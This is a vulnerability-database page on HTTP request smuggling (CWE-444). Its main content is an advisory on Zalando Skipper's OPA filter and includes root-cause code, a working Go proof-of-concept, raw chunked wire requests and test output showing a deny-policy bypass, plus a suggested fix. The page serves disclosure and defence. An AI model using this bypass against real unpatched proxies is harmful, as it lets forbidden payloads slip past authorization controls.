Common Weakness Enumeration

CWE-444

Allowed

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Abstraction: Base · Status: Incomplete

The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.

551 vulnerabilities reference this CWE, most recent first.

GHSA-654Q-5MJ4-74H4

Vulnerability from github – Published: 2026-02-19 00:30 – Updated: 2026-02-19 00:30
VLAI
Details

Improper Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in Delinea Inc. Cloud Suite and Privileged Access Service.

If you're not using the latest Server Suite agents, this fix requires that you upgrade to Server Suite 2023.1 (agent 6.0.1) or later. * If you cannot upgrade to Release 2023.1 (agent version 6.0.1) or later, you can choose one of the following versions:

  • Server Suite release 2023.0.5 (agent version 6.0.0-158)

  • Server Suite release 2022.1.10 (agent version 5.9.1-337)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12811"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-18T23:16:18Z",
    "severity": "MODERATE"
  },
  "details": "Improper Inconsistent Interpretation of\nHTTP Requests (\u0027HTTP Request Smuggling\u0027) in Delinea Inc. Cloud Suite and\nPrivileged Access Service.\n\nIf you\u0027re not using the latest Server Suite agents, this fix requires that you upgrade\u00a0to Server Suite 2023.1 (agent 6.0.1) or later.  *  If you cannot upgrade to Release 2023.1 (agent version 6.0.1) or later, you can choose one of the following versions:\n\n  *  Server Suite release 2023.0.5 (agent version 6.0.0-158)\n\n\n  *  Server Suite release 2022.1.10 (agent version 5.9.1-337)",
  "id": "GHSA-654q-5mj4-74h4",
  "modified": "2026-02-19T00:30:30Z",
  "published": "2026-02-19T00:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12811"
    },
    {
      "type": "WEB",
      "url": "https://docs.delinea.com/online-help/cloud-suite/release-notes/cloud-suite/25.1.htm#Resolved2"
    },
    {
      "type": "WEB",
      "url": "https://trust.delinea.com/?tcuUid=d512dd6a-fa40-421c-ac11-1be280b1cb83"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-659F-RGP5-W4WF

Vulnerability from github – Published: 2026-07-08 20:23 – Updated: 2026-07-08 20:23
VLAI
Summary
Skipper: opaAuthorizeRequestWithBody filter bypasses OPA policy on Transfer-Encoding — chunked / HTTP/2 requests
Details

Summary

zalando/skipper's OpenPolicyAgent integration silently bypasses request-body inspection on HTTP/1.1 Transfer-Encoding: chunked and HTTP/2 requests that omit the content-length pseudo-header. When the opaAuthorizeRequestWithBody filter is configured, the OpenPolicyAgentInstance.ExtractHttpBodyOptionally helper produces an empty raw_body for any request whose Content-Length header is missing, while the underlying chunked body still flows through to the upstream service. Rego policies that gate on input.parsed_body (e.g. "deny when a forbidden field is present") evaluate against an empty document, treat the forbidden field as absent, and authorize the request. The upstream handler then receives the full attacker payload that the policy intended to block.

Affected versions

github.com/zalando/skipper versions <= v0.26.8 (the latest release on 2026-05-26, current master 4eed47ff). The vulnerable helper and gate have lived in filters/openpolicyagent/openpolicyagent.go since the buffered-body extractor was introduced; no released version contains the fix at the time of filing.

Privilege required

Unauthenticated network access to the skipper proxy listener. The threat model targets operators who place skipper in front of a private upstream and rely on opaAuthorizeRequestWithBody to enforce body-content checks (field allow/deny lists, payload schema gates, content-moderation flags, multi-tenant per-action authorization). Both HTTP/1.1 and HTTP/2 clients are affected; HTTP/2 traffic without a content-length pseudo-header is the dominant case because Go's net/http sets http.Request.ContentLength = -1 for chunked HTTP/1.1 AND for HTTP/2 requests whose framing carries the body as DATA frames without an explicit length header.

Root cause

filters/openpolicyagent/openpolicyagent.go:1242-1269 (HEAD 4eed47ff):

func bodyUpperBound(contentLength, maxBodyBytes int64) int64 {
    if contentLength <= 0 {
        return maxBodyBytes
    }
    if contentLength < maxBodyBytes {
        return contentLength
    }
    return maxBodyBytes
}

func (opa *OpenPolicyAgentInstance) ExtractHttpBodyOptionally(req *http.Request) (io.ReadCloser, []byte, func(), error) {
    body := req.Body
    if body != nil && !opa.EnvoyPluginConfig().SkipRequestBodyParse &&
        req.ContentLength <= int64(opa.maxBodyBytes) {
        wrapper := newBufferedBodyReader(req.Body, opa.maxBodyBytes, opa.bodyReadBufferSize)
        requestedBodyBytes := bodyUpperBound(req.ContentLength, opa.maxBodyBytes)
        if !opa.registry.maxMemoryBodyParsingSem.TryAcquire(requestedBodyBytes) {
            return req.Body, nil, func() {}, ErrTotalBodyBytesExceeded
        }
        rawBody, err := wrapper.fillBuffer(req.ContentLength)
        return wrapper, rawBody, func() { opa.registry.maxMemoryBodyParsingSem.Release(requestedBodyBytes) }, err
    }
    return req.Body, nil, func() {}, nil
}

filters/openpolicyagent/openpolicyagent.go:1195-1210:

func (m *bufferedBodyReader) fillBuffer(expectedSize int64) ([]byte, error) {
    var err error
    for err == nil && int64(m.bodyBuffer.Len()) < m.maxBufferSize && int64(m.bodyBuffer.Len()) < expectedSize {
        var n int
        n, err = m.input.Read(m.readBuffer)
        m.bodyBuffer.Write(m.readBuffer[:n])
    }
    if err == io.EOF { err = nil }
    return m.bodyBuffer.Bytes(), err
}

When the client sends Transfer-Encoding: chunked (HTTP/1.1) or an HTTP/2 request without content-length, Go's net/http server sets req.ContentLength = -1. The gate at line 1258 (req.ContentLength <= int64(opa.maxBodyBytes)) is true (-1 <= positiveLimit), so the body gets wrapped in bufferedBodyReader. bodyUpperBound(-1, max) returns max, so the memory semaphore is acquired, but fillBuffer(-1) then evaluates int64(m.bodyBuffer.Len()) < expectedSize as 0 < -1, which is false on the first iteration. The loop never enters, the buffer stays empty, and the helper returns []byte{} as rawBody to the caller.

The caller in filters/openpolicyagent/opaauthorizerequest/opaauthorizerequest.go:121 hands this empty slice to envoy.AdaptToExtAuthRequest which puts it into AttributeContext.Request.Http.RawBody. The OPA SDK then exposes the empty buffer as both input.attributes.request.http.raw_body and the parsed input.parsed_body document (the latter becomes an empty/undefined value). Any Rego rule that asserts the presence of a forbidden field in input.parsed_body evaluates to undefined and fails into the rule's default (typically allow).

Meanwhile, the wrapped body returned to the filter (req.Body = body at line 127 of opaauthorizerequest.go) is a bufferedBodyReader whose Read() falls through to the underlying m.input.Read(p) when the buffer is empty (lines 1212-1228). The upstream handler therefore reads the full attacker payload that OPA was never given a chance to inspect.

Reproduction (E2E against pinned github.com/zalando/skipper@v0.26.8)

GHSA advisories have no file-attachment mechanism, so the complete poc_test.go source and the verbatim go test output are inlined below.

The PoC is a Go test placed in filters/openpolicyagent/opaauthorizerequest/poc_test.go inside a checkout of the v0.26.8 tag, so it links against the exact released source. It boots a real skipper proxy via proxytest.New, configures it with the opaAuthorizeRequestWithBody filter pointing at an in-process opasdktest.MustNewServer bundle server, installs a Rego policy that DENIES requests whose body contains admin=true, and adds a tiny upstream that records the body it actually received. It then drives the proxy over a raw TCP socket (net.DialTimeout + http.ReadResponse) to control the wire framing precisely, sending three requests.

poc_test.go:

package opaauthorizerequest

// PoC: opaAuthorizeRequestWithBody OPA-bypass on chunked / HTTP2 framing.
//
// The filter's body extractor (filters/openpolicyagent/openpolicyagent.go,
// ExtractHttpBodyOptionally) gates on `req.ContentLength <= maxBodyBytes`
// and then calls fillBuffer(req.ContentLength). When the client sends the
// body with Transfer-Encoding: chunked (HTTP/1.1) or via HTTP/2 without a
// declared length, net/http sets req.ContentLength = -1. The gate passes
// (-1 <= max) but fillBuffer's loop condition `len(buf) < expectedSize(-1)`
// is immediately false, so the buffered body is EMPTY. OPA therefore sees an
// empty input.parsed_body, a deny-policy that keys on the body fails open,
// and the full attacker body is forwarded upstream.
//
// This test boots a real skipper proxy (proxytest) with the
// opaAuthorizeRequestWithBody filter pointed at an in-process OPA bundle
// server (opasdktest) hosting a deny-when-admin=true policy, plus a tiny
// upstream that records the body it actually received. It then drives the
// proxy over a raw TCP socket to control the wire framing precisely.

import (
    "bufio"
    "fmt"
    "io"
    "net"
    "net/http"
    "net/http/httptest"
    "strings"
    "sync"
    "testing"
    "time"

    opasdktest "github.com/open-policy-agent/opa/v1/sdk/test"
    "github.com/zalando/skipper/eskip"
    "github.com/zalando/skipper/filters"
    "github.com/zalando/skipper/filters/builtin"
    "github.com/zalando/skipper/proxy/proxytest"
    "github.com/zalando/skipper/tracing/tracingtest"

    "github.com/zalando/skipper/filters/openpolicyagent"
)

// rawRequest opens a fresh TCP connection to addr, writes wire verbatim, and
// returns the parsed HTTP response.
func rawRequest(t *testing.T, addr, wire string) *http.Response {
    t.Helper()
    conn, err := net.DialTimeout("tcp", addr, 5*time.Second)
    if err != nil {
        t.Fatalf("dial %s: %v", addr, err)
    }
    defer conn.Close()
    _ = conn.SetDeadline(time.Now().Add(10 * time.Second))

    if _, err := io.WriteString(conn, wire); err != nil {
        t.Fatalf("write wire: %v", err)
    }

    resp, err := http.ReadResponse(bufio.NewReader(conn), nil)
    if err != nil {
        t.Fatalf("read response: %v", err)
    }
    // Drain so the body received by upstream is flushed before we inspect it.
    _, _ = io.Copy(io.Discard, resp.Body)
    _ = resp.Body.Close()
    return resp
}

func TestSkipperOPABypassPoC(t *testing.T) {
    // Upstream records, per request, the body bytes it actually received.
    var mu sync.Mutex
    var upstreamBodies []string
    upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
        b, _ := io.ReadAll(r.Body)
        mu.Lock()
        upstreamBodies = append(upstreamBodies, string(b))
        mu.Unlock()
        w.WriteHeader(http.StatusOK)
        _, _ = w.Write([]byte("UPSTREAM-REACHED"))
    }))
    defer upstream.Close()

    // OPA bundle: allow by default, deny only when the parsed body says admin==true.
    opaControlPlane := opasdktest.MustNewServer(
        opasdktest.MockBundle("/bundles/test", map[string]string{
            "main.rego": `
                package envoy.authz

                import rego.v1

                default allow := true

                allow := false if {
                    input.parsed_body.admin == true
                }
            `,
        }),
    )
    defer opaControlPlane.Stop()

    config := fmt.Appendf(nil, `{
        "services": {
            "test": {
                "url": %q
            }
        },
        "bundles": {
            "test": {
                "resource": "/bundles/{{ .bundlename }}"
            }
        },
        "labels": {
            "environment": "test"
        },
        "plugins": {
            "envoy_ext_authz_grpc": {
                "path": "envoy/authz/allow",
                "dry-run": false
            }
        }
    }`, opaControlPlane.URL())

    opts := []func(*openpolicyagent.OpenPolicyAgentInstanceConfig) error{
        openpolicyagent.WithConfigTemplate(config),
    }

    opaFactory, err := openpolicyagent.NewOpenPolicyAgentRegistry(
        openpolicyagent.WithTracer(tracingtest.NewTracer()),
        openpolicyagent.WithOpenPolicyAgentInstanceConfig(opts...),
    )
    if err != nil {
        t.Fatalf("registry: %v", err)
    }

    fr := make(filters.Registry)
    fr.Register(NewOpaAuthorizeRequestWithBodySpec(opaFactory))
    fr.Register(builtin.NewSetPath())

    // Route: every request runs opaAuthorizeRequestWithBody, then proxies to upstream.
    r := eskip.MustParse(fmt.Sprintf(
        `* -> opaAuthorizeRequestWithBody("test") -> "%s"`, upstream.URL))

    proxy := proxytest.New(fr, r...)
    defer proxy.Close()

    host := strings.TrimPrefix(proxy.URL, "http://")

    type tc struct {
        name       string
        wire       string
        wantStatus int
        wantUpstrm bool // whether upstream is expected to be reached
    }

    cases := []tc{
        {
            name: "1: Content-Length benign body -> 200 ALLOW",
            wire: "POST /priv HTTP/1.1\r\n" +
                "Host: " + host + "\r\n" +
                "Content-Type: application/json\r\n" +
                "Connection: close\r\n" +
                "Content-Length: 15\r\n" +
                "\r\n" +
                `{"admin":false}`,
            wantStatus: 200,
            wantUpstrm: true,
        },
        {
            name: "2: Content-Length admin body -> 403 DENY (negative control)",
            wire: "POST /priv HTTP/1.1\r\n" +
                "Host: " + host + "\r\n" +
                "Content-Type: application/json\r\n" +
                "Connection: close\r\n" +
                "Content-Length: 14\r\n" +
                "\r\n" +
                `{"admin":true}`,
            wantStatus: 403,
            wantUpstrm: false,
        },
        {
            name: "3: chunked admin body -> EXPECTED 403, BUG 200 (bypass)",
            wire: "POST /priv HTTP/1.1\r\n" +
                "Host: " + host + "\r\n" +
                "Content-Type: application/json\r\n" +
                "Connection: close\r\n" +
                "Transfer-Encoding: chunked\r\n" +
                "\r\n" +
                "e\r\n" +
                `{"admin":true}` + "\r\n" +
                "0\r\n" +
                "\r\n",
            wantStatus: 200, // documents the BUG: should be 403 but the bypass yields 200
            wantUpstrm: true,
        },
    }

    for _, c := range cases {
        mu.Lock()
        before := len(upstreamBodies)
        mu.Unlock()

        resp := rawRequest(t, host, c.wire)

        mu.Lock()
        reached := len(upstreamBodies) > before
        var lastBody string
        if reached {
            lastBody = upstreamBodies[len(upstreamBodies)-1]
        }
        mu.Unlock()

        t.Logf("[%s] status=%d upstreamReached=%v upstreamBody=%q",
            c.name, resp.StatusCode, reached, lastBody)

        if resp.StatusCode != c.wantStatus {
            t.Errorf("[%s] status = %d, want %d", c.name, resp.StatusCode, c.wantStatus)
        }
        if reached != c.wantUpstrm {
            t.Errorf("[%s] upstreamReached = %v, want %v", c.name, reached, c.wantUpstrm)
        }
    }

    // Explicit bypass assertion: the chunked admin body MUST have reached
    // upstream verbatim despite the deny policy.
    mu.Lock()
    defer mu.Unlock()
    bypassed := false
    for _, b := range upstreamBodies {
        if b == `{"admin":true}` {
            bypassed = true
        }
    }
    if bypassed {
        t.Logf("BYPASS CONFIRMED: upstream received {\"admin\":true} despite deny policy (OPA saw empty parsed_body for the chunked request)")
    } else {
        t.Errorf("expected the chunked admin body to reach upstream (bypass), but it did not")
    }
}

The three requests cover:

# Wire framing Body Expected Got
1 Content-Length: 15 {"admin":false} 200 ALLOW 200 (upstream reached)
2 Content-Length: 14 {"admin":true} 403 DENY 403 (OPA blocked)
3 Transfer-Encoding: chunked {"admin":true} 403 DENY 200 ALLOW (bypass)

Test 3 wire bytes: POST /priv HTTP/1.1\r\nHost: ...\r\nContent-Type: application/json\r\nConnection: close\r\nTransfer-Encoding: chunked\r\n\r\ne\r\n{"admin":true}\r\n0\r\n\r\n.

Run command and verbatim output (go version go1.26.3 darwin/arm64, github.com/open-policy-agent/opa v1.14.1 as pinned by skipper v0.26.8):

$ go test -v -run TestSkipperOPABypassPoC -count=1 ./filters/openpolicyagent/opaauthorizerequest/
=== RUN   TestSkipperOPABypassPoC
2026/05/28 14:43:47 route settings, reset, route: : * -> opaAuthorizeRequestWithBody("test") -> "http://127.0.0.1:57343"
2026/05/28 14:43:47 route settings received, id: 1
time="2026-05-28T14:43:47+08:00" level=info msg="Starting OPA instance..." bundle-name=test
time="2026-05-28T14:43:47+08:00" level=info msg="OPA instance health updated: healthy=false status=map[bundle:{NOT_READY \"\"} discovery:{NOT_READY \"\"} envoy_ext_authz_grpc:{OK \"\"}]" bundle-name=test
time="2026-05-28T14:43:47+08:00" level=info msg="OPA instance health updated: healthy=false status=map[bundle:{NOT_READY \"\"} discovery:{OK \"\"} envoy_ext_authz_grpc:{OK \"\"}]" bundle-name=test
time="2026-05-28T14:43:47+08:00" level=info msg="OPA instance health updated: healthy=true status=map[bundle:{OK \"\"} discovery:{OK \"\"} envoy_ext_authz_grpc:{OK \"\"}]" bundle-name=test
2026/05/28 14:43:47 route settings applied, id: 1
    poc_test.go:211: [1: Content-Length benign body -> 200 ALLOW] status=200 upstreamReached=true upstreamBody="{\"admin\":false}"
    poc_test.go:211: [2: Content-Length admin body -> 403 DENY (negative control)] status=403 upstreamReached=false upstreamBody=""
    poc_test.go:211: [3: chunked admin body -> EXPECTED 403, BUG 200 (bypass)] status=200 upstreamReached=true upstreamBody="{\"admin\":true}"
    poc_test.go:233: BYPASS CONFIRMED: upstream received {"admin":true} despite deny policy (OPA saw empty parsed_body for the chunked request)
--- PASS: TestSkipperOPABypassPoC (0.11s)
PASS
ok      github.com/zalando/skipper/filters/openpolicyagent/opaauthorizerequest  1.897s

Test 1 (Content-Length, benign body) is allowed and reaches upstream with {"admin":false}. Test 2 is the negative control: the same {"admin":true} payload sent with a Content-Length header is correctly DENIED (HTTP 403) and never reaches the upstream, proving the policy itself is sound. Test 3 sends the identical forbidden body as Transfer-Encoding: chunked; OPA evaluates an empty parsed_body, the deny rule fails open, the proxy returns HTTP 200, and the upstream receives the full {"admin":true} payload that the policy was configured to block.

Impact

Operators relying on opaAuthorizeRequestWithBody for body-content authorization are silently downgraded to header/path-only authorization for any client that emits chunked or HTTP/2 requests. Concrete production patterns affected:

  • "Deny when body contains admin/privileged field" guardrails for multi-tenant or role-stratified APIs;
  • "Deny when content-moderation flag is present" filters in front of user-content endpoints;
  • "Deny when payload schema version is forbidden" gates for deprecated-API shutdown;
  • "Deny when SQL/command-injection-shaped string is present" generic body validators.

In every case the chunked attack arrives with the forbidden body intact, OPA evaluates against an empty document, the policy fails open, and the upstream receives the attacker payload that the deployment was specifically configured to block. There is no log signal in OPA's decision log distinguishing "body was empty" from "client did not send a body".

Note that the OPA decision log will record the request as ALLOWED with raw_body length 0, which complicates post-hoc forensic detection. The upstream's request log will show the full body, producing a confusing allow/observed asymmetry across systems.

CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N (8.5 HIGH). Scope is Changed because the failure crosses the trust boundary between the authorization filter and the upstream service.

Suggested fix

filters/openpolicyagent/openpolicyagent.go:

 func (opa *OpenPolicyAgentInstance) ExtractHttpBodyOptionally(req *http.Request) (io.ReadCloser, []byte, func(), error) {
    body := req.Body

+   // `req.ContentLength == -1` is set by net/http when the client uses
+   // Transfer-Encoding: chunked (HTTP/1.1) or omits content-length in
+   // HTTP/2 framing. Treat unknown-length bodies as up-to-max-bytes and
+   // drive fillBuffer with the policy cap instead of the negative
+   // sentinel, otherwise the fillBuffer loop short-circuits on its
+   // `len < expectedSize` predicate and OPA evaluates an empty body.
+   expectedSize := req.ContentLength
+   if expectedSize < 0 {
+       expectedSize = opa.maxBodyBytes
+   }
+
    if body != nil && !opa.EnvoyPluginConfig().SkipRequestBodyParse &&
-       req.ContentLength <= int64(opa.maxBodyBytes) {
+       expectedSize <= int64(opa.maxBodyBytes) {

        wrapper := newBufferedBodyReader(req.Body, opa.maxBodyBytes, opa.bodyReadBufferSize)

-       requestedBodyBytes := bodyUpperBound(req.ContentLength, opa.maxBodyBytes)
+       requestedBodyBytes := bodyUpperBound(expectedSize, opa.maxBodyBytes)
        if !opa.registry.maxMemoryBodyParsingSem.TryAcquire(requestedBodyBytes) {
            return req.Body, nil, func() {}, ErrTotalBodyBytesExceeded
        }

-       rawBody, err := wrapper.fillBuffer(req.ContentLength)
+       rawBody, err := wrapper.fillBuffer(expectedSize)
        return wrapper, rawBody, func() { opa.registry.maxMemoryBodyParsingSem.Release(requestedBodyBytes) }, err
    }

    return req.Body, nil, func() {}, nil
 }

After the fix, fillBuffer(maxBodyBytes) reads chunked bodies up to the configured cap. If the body exceeds the cap, the existing Read() path already returns the wrapped reader for downstream consumption, matching the documented behaviour for over-cap requests today; the operator-configured maxRequestBodyBytes continues to be the single knob governing memory allocation.

A regression test TestOpaAuthorizeRequestWithBody_ChunkedBodyIsParsed in filters/openpolicyagent/opaauthorizerequest/opaauthorizerequest_test.go should send a Transfer-Encoding: chunked request matching a blacklist policy and assert HTTP 403, and a same-payload Content-Length request to confirm parity.

Credit

Reported by tonghuaroot.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/zalando/skipper"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.26.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50197"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-08T20:23:44Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`zalando/skipper`\u0027s OpenPolicyAgent integration silently bypasses request-body\ninspection on HTTP/1.1 `Transfer-Encoding: chunked` and HTTP/2 requests that\nomit the `content-length` pseudo-header. When the\n`opaAuthorizeRequestWithBody` filter is configured, the\n`OpenPolicyAgentInstance.ExtractHttpBodyOptionally` helper produces an\nempty `raw_body` for any request whose `Content-Length` header is missing,\nwhile the underlying chunked body still flows through to the upstream\nservice. Rego policies that gate on `input.parsed_body` (e.g. \"deny when a\nforbidden field is present\") evaluate against an empty document, treat the\nforbidden field as absent, and authorize the request. The upstream handler\nthen receives the full attacker payload that the policy intended to block.\n\n### Affected versions\n\n`github.com/zalando/skipper` versions `\u003c= v0.26.8` (the latest release on\n2026-05-26, current `master` `4eed47ff`). The vulnerable helper and gate\nhave lived in `filters/openpolicyagent/openpolicyagent.go` since the\nbuffered-body extractor was introduced; no released version contains the\nfix at the time of filing.\n\n### Privilege required\n\nUnauthenticated network access to the skipper proxy listener. The threat\nmodel targets operators who place skipper in front of a private upstream\nand rely on `opaAuthorizeRequestWithBody` to enforce body-content checks\n(field allow/deny lists, payload schema gates, content-moderation flags,\nmulti-tenant per-action authorization). Both HTTP/1.1 and HTTP/2 clients\nare affected; HTTP/2 traffic without a `content-length` pseudo-header is\nthe dominant case because Go\u0027s `net/http` sets\n`http.Request.ContentLength = -1` for chunked HTTP/1.1 AND for HTTP/2\nrequests whose framing carries the body as DATA frames without an explicit\nlength header.\n\n### Root cause\n\n`filters/openpolicyagent/openpolicyagent.go:1242-1269` (HEAD `4eed47ff`):\n\n```go\nfunc bodyUpperBound(contentLength, maxBodyBytes int64) int64 {\n    if contentLength \u003c= 0 {\n        return maxBodyBytes\n    }\n    if contentLength \u003c maxBodyBytes {\n        return contentLength\n    }\n    return maxBodyBytes\n}\n\nfunc (opa *OpenPolicyAgentInstance) ExtractHttpBodyOptionally(req *http.Request) (io.ReadCloser, []byte, func(), error) {\n    body := req.Body\n    if body != nil \u0026\u0026 !opa.EnvoyPluginConfig().SkipRequestBodyParse \u0026\u0026\n        req.ContentLength \u003c= int64(opa.maxBodyBytes) {\n        wrapper := newBufferedBodyReader(req.Body, opa.maxBodyBytes, opa.bodyReadBufferSize)\n        requestedBodyBytes := bodyUpperBound(req.ContentLength, opa.maxBodyBytes)\n        if !opa.registry.maxMemoryBodyParsingSem.TryAcquire(requestedBodyBytes) {\n            return req.Body, nil, func() {}, ErrTotalBodyBytesExceeded\n        }\n        rawBody, err := wrapper.fillBuffer(req.ContentLength)\n        return wrapper, rawBody, func() { opa.registry.maxMemoryBodyParsingSem.Release(requestedBodyBytes) }, err\n    }\n    return req.Body, nil, func() {}, nil\n}\n```\n\n`filters/openpolicyagent/openpolicyagent.go:1195-1210`:\n\n```go\nfunc (m *bufferedBodyReader) fillBuffer(expectedSize int64) ([]byte, error) {\n    var err error\n    for err == nil \u0026\u0026 int64(m.bodyBuffer.Len()) \u003c m.maxBufferSize \u0026\u0026 int64(m.bodyBuffer.Len()) \u003c expectedSize {\n        var n int\n        n, err = m.input.Read(m.readBuffer)\n        m.bodyBuffer.Write(m.readBuffer[:n])\n    }\n    if err == io.EOF { err = nil }\n    return m.bodyBuffer.Bytes(), err\n}\n```\n\nWhen the client sends `Transfer-Encoding: chunked` (HTTP/1.1) or an\nHTTP/2 request without `content-length`, Go\u0027s `net/http` server sets\n`req.ContentLength = -1`. The gate at line 1258 (`req.ContentLength \u003c=\nint64(opa.maxBodyBytes)`) is true (`-1 \u003c= positiveLimit`), so the body\ngets wrapped in `bufferedBodyReader`. `bodyUpperBound(-1, max)` returns\n`max`, so the memory semaphore is acquired, but `fillBuffer(-1)` then\nevaluates `int64(m.bodyBuffer.Len()) \u003c expectedSize` as `0 \u003c -1`, which\nis false on the first iteration. The loop never enters, the buffer stays\nempty, and the helper returns `[]byte{}` as `rawBody` to the caller.\n\nThe caller in\n`filters/openpolicyagent/opaauthorizerequest/opaauthorizerequest.go:121`\nhands this empty slice to `envoy.AdaptToExtAuthRequest` which puts it\ninto `AttributeContext.Request.Http.RawBody`. The OPA SDK then exposes\nthe empty buffer as both `input.attributes.request.http.raw_body` and\nthe parsed `input.parsed_body` document (the latter becomes an\nempty/undefined value). Any Rego rule that asserts the presence of a\nforbidden field in `input.parsed_body` evaluates to undefined and fails\ninto the rule\u0027s default (typically `allow`).\n\nMeanwhile, the wrapped `body` returned to the filter (`req.Body = body`\nat line 127 of `opaauthorizerequest.go`) is a `bufferedBodyReader` whose\n`Read()` falls through to the underlying `m.input.Read(p)` when the\nbuffer is empty (lines 1212-1228). The upstream handler therefore reads\nthe full attacker payload that OPA was never given a chance to inspect.\n\n### Reproduction (E2E against pinned `github.com/zalando/skipper@v0.26.8`)\n\nGHSA advisories have no file-attachment mechanism, so the complete\n`poc_test.go` source and the verbatim `go test` output are inlined below.\n\nThe PoC is a Go test placed in\n`filters/openpolicyagent/opaauthorizerequest/poc_test.go` inside a checkout\nof the `v0.26.8` tag, so it links against the exact released source. It\nboots a real skipper proxy via `proxytest.New`, configures it with the\n`opaAuthorizeRequestWithBody` filter pointing at an in-process\n`opasdktest.MustNewServer` bundle server, installs a Rego policy that\nDENIES requests whose body contains `admin=true`, and adds a tiny upstream\nthat records the body it actually received. It then drives the proxy over a\nraw TCP socket (`net.DialTimeout` + `http.ReadResponse`) to control the\nwire framing precisely, sending three requests.\n\n`poc_test.go`:\n\n```go\npackage opaauthorizerequest\n\n// PoC: opaAuthorizeRequestWithBody OPA-bypass on chunked / HTTP2 framing.\n//\n// The filter\u0027s body extractor (filters/openpolicyagent/openpolicyagent.go,\n// ExtractHttpBodyOptionally) gates on `req.ContentLength \u003c= maxBodyBytes`\n// and then calls fillBuffer(req.ContentLength). When the client sends the\n// body with Transfer-Encoding: chunked (HTTP/1.1) or via HTTP/2 without a\n// declared length, net/http sets req.ContentLength = -1. The gate passes\n// (-1 \u003c= max) but fillBuffer\u0027s loop condition `len(buf) \u003c expectedSize(-1)`\n// is immediately false, so the buffered body is EMPTY. OPA therefore sees an\n// empty input.parsed_body, a deny-policy that keys on the body fails open,\n// and the full attacker body is forwarded upstream.\n//\n// This test boots a real skipper proxy (proxytest) with the\n// opaAuthorizeRequestWithBody filter pointed at an in-process OPA bundle\n// server (opasdktest) hosting a deny-when-admin=true policy, plus a tiny\n// upstream that records the body it actually received. It then drives the\n// proxy over a raw TCP socket to control the wire framing precisely.\n\nimport (\n\t\"bufio\"\n\t\"fmt\"\n\t\"io\"\n\t\"net\"\n\t\"net/http\"\n\t\"net/http/httptest\"\n\t\"strings\"\n\t\"sync\"\n\t\"testing\"\n\t\"time\"\n\n\topasdktest \"github.com/open-policy-agent/opa/v1/sdk/test\"\n\t\"github.com/zalando/skipper/eskip\"\n\t\"github.com/zalando/skipper/filters\"\n\t\"github.com/zalando/skipper/filters/builtin\"\n\t\"github.com/zalando/skipper/proxy/proxytest\"\n\t\"github.com/zalando/skipper/tracing/tracingtest\"\n\n\t\"github.com/zalando/skipper/filters/openpolicyagent\"\n)\n\n// rawRequest opens a fresh TCP connection to addr, writes wire verbatim, and\n// returns the parsed HTTP response.\nfunc rawRequest(t *testing.T, addr, wire string) *http.Response {\n\tt.Helper()\n\tconn, err := net.DialTimeout(\"tcp\", addr, 5*time.Second)\n\tif err != nil {\n\t\tt.Fatalf(\"dial %s: %v\", addr, err)\n\t}\n\tdefer conn.Close()\n\t_ = conn.SetDeadline(time.Now().Add(10 * time.Second))\n\n\tif _, err := io.WriteString(conn, wire); err != nil {\n\t\tt.Fatalf(\"write wire: %v\", err)\n\t}\n\n\tresp, err := http.ReadResponse(bufio.NewReader(conn), nil)\n\tif err != nil {\n\t\tt.Fatalf(\"read response: %v\", err)\n\t}\n\t// Drain so the body received by upstream is flushed before we inspect it.\n\t_, _ = io.Copy(io.Discard, resp.Body)\n\t_ = resp.Body.Close()\n\treturn resp\n}\n\nfunc TestSkipperOPABypassPoC(t *testing.T) {\n\t// Upstream records, per request, the body bytes it actually received.\n\tvar mu sync.Mutex\n\tvar upstreamBodies []string\n\tupstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tb, _ := io.ReadAll(r.Body)\n\t\tmu.Lock()\n\t\tupstreamBodies = append(upstreamBodies, string(b))\n\t\tmu.Unlock()\n\t\tw.WriteHeader(http.StatusOK)\n\t\t_, _ = w.Write([]byte(\"UPSTREAM-REACHED\"))\n\t}))\n\tdefer upstream.Close()\n\n\t// OPA bundle: allow by default, deny only when the parsed body says admin==true.\n\topaControlPlane := opasdktest.MustNewServer(\n\t\topasdktest.MockBundle(\"/bundles/test\", map[string]string{\n\t\t\t\"main.rego\": `\n\t\t\t\tpackage envoy.authz\n\n\t\t\t\timport rego.v1\n\n\t\t\t\tdefault allow := true\n\n\t\t\t\tallow := false if {\n\t\t\t\t\tinput.parsed_body.admin == true\n\t\t\t\t}\n\t\t\t`,\n\t\t}),\n\t)\n\tdefer opaControlPlane.Stop()\n\n\tconfig := fmt.Appendf(nil, `{\n\t\t\"services\": {\n\t\t\t\"test\": {\n\t\t\t\t\"url\": %q\n\t\t\t}\n\t\t},\n\t\t\"bundles\": {\n\t\t\t\"test\": {\n\t\t\t\t\"resource\": \"/bundles/{{ .bundlename }}\"\n\t\t\t}\n\t\t},\n\t\t\"labels\": {\n\t\t\t\"environment\": 